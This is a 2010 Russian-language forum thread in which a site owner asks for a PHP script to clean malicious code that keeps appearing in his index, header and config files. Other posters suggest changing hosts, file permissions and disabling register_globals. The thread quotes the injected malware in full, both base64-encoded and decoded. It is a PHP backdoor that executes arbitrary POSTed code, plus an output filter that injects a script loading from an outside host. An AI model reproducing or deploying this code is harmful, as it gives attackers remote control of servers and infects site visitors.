нужен скрипт, описание в теме Опции

[turbu]

Вообшем такая байда, у меня на постой на сайт добавляеца вредный код в такие файлы как "index.htm|html|php, default.* header.* footer.* config.*"

воозможно ли написать такой скрипт(на пхп) чтоб при отрытие этого файла удалялся вредный код с этих файлов,

одни из вредных кодов (добавляеца в начало файла)

КОД

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJvJykpe2Z1bmN0aW9uIHhybygkcyl7aWYocHJlZ19tYXRj
aF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilp
Z
ihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO
1
w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9
IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9t
Q
2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY
2
UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0
Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9u
Z
SNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlK
C
R2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZW
N
vZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyUmxibWx6Wlc0dVkyOXRMbU51TDJWa2FYUnZjaTl
N
U1VORlRsTkZMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScp
K
SRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvc
y
gkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24geHJvMigkYSwkYiwkYywkZCl7Z2xvYm
F
sJHhybzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHhybzEpKWNhbGxfdXNlcl9mdW5jKCR
4
cm8xLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25h
b
WUnXSk9PSd4cm8nKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdP
W
FycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2Nv
bnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd4cm8nKTtmb3IoJGk9MDskaTxjb3VudCgk
c
yk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0keHJvbD0oKCRhPUBzZ
X
RfZXJyb3JfaGFuZGxlcigneHJvMicpKSE9J3hybzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1
B
PU1RbJ2UnXSkpOw==')); ?>

и бывает такое добавляется в конец файла

КОД

<script src=http://denisen.com.cn/editor/LICENSE.php ></script>

Сообщение отредактировал turbu: Mar 15 2010, 16:02

[patriot]

возможно. уже написан

[XaXoL]

turbu, думаю стоит задуматься о новом хостинге. Это взлом со стороны сервера.
Встречался с подобной мутью, сначала пока не было возможности сменить хостера пришлось поставить на все файлы цмод 444. Потом просто забрал сайт с гамнахостинга.


patriot, и где можно увидеть сие чудо? (IMG:http://antislaed.net/style_emoticons/default/rolleyes.gif)

[turbu]

XaXoL, да вот подумываю над этим)
patriot,хотелось бы тоже увидеть )

[rAmantiK]

XaXoL +1
Тоже встречался с такими хостерами.
Но понял причину только после переезда на другой хостинг.

[Mylenovez]

turbu а у тебя случайно Register globals не в режиме On?

[turbu]

Mylenovez, on

[Mylenovez]

turbu, ставь off и никаких лишних кодов у тебя больше не появится - это всё из-за Register globals

[Zoom]

выглядит это все примерно так =)))

КОД

if(!function_exists('xro')){function xro($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RlbmlzZW4uY29tLmNuL2VkaXRvci9MSUNFTlNFLnBocCA+PC9z
Y3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function xro2($a,$b,$c,$d){global$xro1;$s=array();if(function_exists($xro1))call_user_func($xro1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='xro')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('xro');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$xrol=(($a=@set_error_handler('xro2'))!='xro2')?$a:0;eval(base64_decode($_POST['e']));

[patriot]

XaXoL, turbu это маленький скриптик со следующими настройками:

КОД

  
  $deep = isset($_GET['levels']) ? intval($_GET['levels']) : 0;
  $mode = isset($_GET['work']) ? 'work' : 'preview';
  
  //files filters
  $process_files = array('index.php', 'index.html');
  
  //fragments to cut
  $search_array = array(
        '`<div style="visibility:hidden"><iframe.+</iframe></div>`isU'
  );
  
  //ftp settings
  $ftp_data = array(
    'server' => '',  //ftp host
    'username' => '',  //ftp username
    'password' => '',  //ftp password
    'path_from_ftproot' => '');  //path from ftp root